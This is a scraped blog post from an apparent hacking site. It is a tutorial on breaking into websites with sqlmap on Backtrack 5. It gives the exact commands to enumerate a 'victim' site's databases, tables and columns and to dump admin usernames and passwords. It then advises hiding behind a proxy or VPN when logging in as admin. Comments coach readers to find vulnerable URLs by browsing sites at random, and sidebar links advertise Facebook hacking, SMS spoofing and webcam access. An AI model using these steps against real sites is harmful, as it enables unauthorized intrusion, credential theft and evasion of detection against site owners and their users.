Hack Website Using Backtrack

03/10/2013

Hack website using Backtrack (sqlmap) | Hack For Security

Search This Site

FILLED UNDER: Back track 5, backtrack, Sql injection, Webhacking

Hack website using Backtrack (sqlmap)

LIKE AND TWEET

3 Tw eet

138

Stay Connected :)

Like

HACK FOR SECURITY

HOME

CYBER NEWS

DEFACEMENTS

BACKTRACK

TOOLS

WEBHACKING

DOWNLOAD

Posted By: SiddhartH SolankI on 05:00

advertisements

Learn Ethical Hacking www.Koenig-India.com

Certified Ethical Hacker Courses by Koenig Solution Limited

4,000+

10,000+

200+

300+

For Latest news And Updates Sign Up

In my previous tutorial I have explained what is backtrack, now in this tutorial I am going to show you how to hack website using Backtrack 5 (sqlmap). Sqlmap is a automatic sql injection tool which helps you to hack website easily. Follow the simple steps to hack website using backtrack 5 sqlmap tool. 1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal

SIGN UP

We Are On YouTube siddharth solanki YouTube

2. Now find the vulnerable site. (well I already have vulnerable site)

9

Google+ Followers SiddhartH SolankI Add to circles

3. Now type this command in the terminal and hit enter.(refer above figure)

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs 4. Now you will get the database name of the website

93 have me in circles

View all

Followers

www.hackforsecurity.net/2012/07/hack-website-using-backtrack-sqlmap.html

1/5

03/10/2013

Hack website using Backtrack (sqlmap) | Hack For Security Join this site w ith Google Friend Connect

Members (33) More »

Well I got the two database aj and information_schema we will select aj database. 5. Now get the tables of that database. for that you need to enter this command into your terminal and

Already a member? Sign in

Popular Posts

simply hit Enter. Hack facebook account and Gmail account using Backtrack 5

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) –tables

6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.

Free download super Bluetooth hack for mobile free download IDM with lifetime license Hack website using Backtrack (sqlmap)

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables

Hack Facebook passwords-Facebook hacker software [for n00b] Collection of Top 10 Deface page Best SMS Spoofer: Send Fake SMS Sql Poizon ~ Sqli Exploit Scanner Tool Admin finder perl script

7. Now you will get the tables list which is stored in aj database.

How to create a bootable pendrive of kali Linux

Labels admin finder Android Anonymous

backtrack Bangla hacker

cyber news cyber war deface

download

exploits

Back track 5

Blogging Books page

cyber attack

Defacements

facebook

Facebook

Facebook security Google Hacking Books

hacking

hacking

Indian hackers keylogger linux News OS Pakistani hackers security SEO shell tools

Smartphones sms spoofing spoofing Sql Traffic

vulnerability

webcam

injection tools

Webhacking

website hacking windows tricks WordPress xss 8. Now lets grab the columns from the admin table

Find us on Facebook

Cyber security

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns

Like 12,572 people like Cyber security.

Facebook social plugin

Now we got the columns and we got username and password www.hackforsecurity.net/2012/07/hack-website-using-backtrack-sqlmap.html

2/5

03/10/2013

Hack website using Backtrack (sqlmap) | Hack For Security

9. Now lets grab the passwords of the admin

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test -dump Now we got the username and the password of the website !

Now just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin. advertisements

Download Free Software mobogenie.com/download-software

Download Free PC Manager Software. Easy File Transfer. Download Now ! If You Enjoyed This Post Please Take 5 Seconds To Share It. 1

544

39

Blogger

76

Stumble

9

20.8K

Related Posts

Maxsqli syntax maker tool

Sql Poizon ~ Sqli Exploit Scanner T...

SQL INJECTION (From start to Deface...

How to get the passwords hidden beh...

NEWER POST

www.hackforsecurity.net/2012/07/hack-website-using-backtrack-sqlmap.html

Introduction to Cross Site Scriptin...

OLDER POST

3/5

03/10/2013

Hack website using Backtrack (sqlmap) | Hack For Security

★

9 comments

0

Leave a message... Best

Share

Community

Avatar

P roblem

⤤

⚙

• 2 months ago

cd /pentest/database/sqlmap No such file or directory :( what is problem ?

△ ▽

Reply

Share ›

Hac k For S ec urit y

> Problem

Mod

• 2 months ago

You might be using older version of the backtrack

△ ▽ Avatar

Reply

k aveh k horram

Share ›

• 6 months ago

How do you find the php.?id=(number) on a webpage?

△ ▽

Reply

Share ›

Hac k For S ec urit y

> kaveh khorram

Mod

• 6 months ago

Just surf the website and find it ;)

△ ▽

Reply

Share ›

k id des t roy er

> Hack For Security

• 5 months ago

Bro i Think it will not Work on Every no. which i Find during Surfing, Isn't it ?

△ ▽

Reply

Share ›

Hac k For S ec urit y

Mod

> kid destroyer

• 5 months ago

yup ;)

△ ▽ Avatar

A mmer A mmar

Reply

Share ›

• 7 months ago

Nice Work Man but is it working on all suites or one types ? thnx .. ameer from irq

△ ▽

Reply

Share ›

Hac k For S ec urit y

> Ammer Ammar

Mod

• 4 months ago

Its working only for sql vulnerable sites !

△ ▽ Avatar

P unt oinfinit o

Reply

Share ›

• 7 months ago

nice, but one high problem of sqmap.py is that is so slower :( and for do one biggest attack u have to wait a lot ... but anyway that's cool :D

△ ▽

Reply

Share ›

ALSO ON HACK FOR SECURITY

WHA T ' S T HI S ?

How to gain access to unprotected webcams using Google 1 comment • 8 months ago

Collection of Top 10 Deface page 1 comment • 8 months ago

Galapagos — The best deface page is from

"SMed79" view mirror on http://www.zoneh.com/archive/...

mark — can't believe it works.. lol

Hack WordPress Blog in easy way

Admin finder perl script

3 comments • 8 months ago

1 comment • 8 months ago

✉

k nz — Because i think it's salted hash, yous

S hofa Nur Hanifa — trimakasih sudah share

hsold find somthing that uses salt

admin findernya..

Su b s cri b e

Home

d

Ad d D i s q u s to yo u r s i te

About Me

Disclamier

Contect Us

Ultimate Blogger Tricks

www.hackforsecurity.net/2012/07/hack-website-using-backtrack-sqlmap.html

Learn Photoshop

Advertise With Us

Back To Top

4/5

03/10/2013

Hack website using Backtrack (sqlmap) | Hack For Security Hack For Security © 2013. All Rights Reserved | Contact | About

www.hackforsecurity.net/2012/07/hack-website-using-backtrack-sqlmap.html

5/5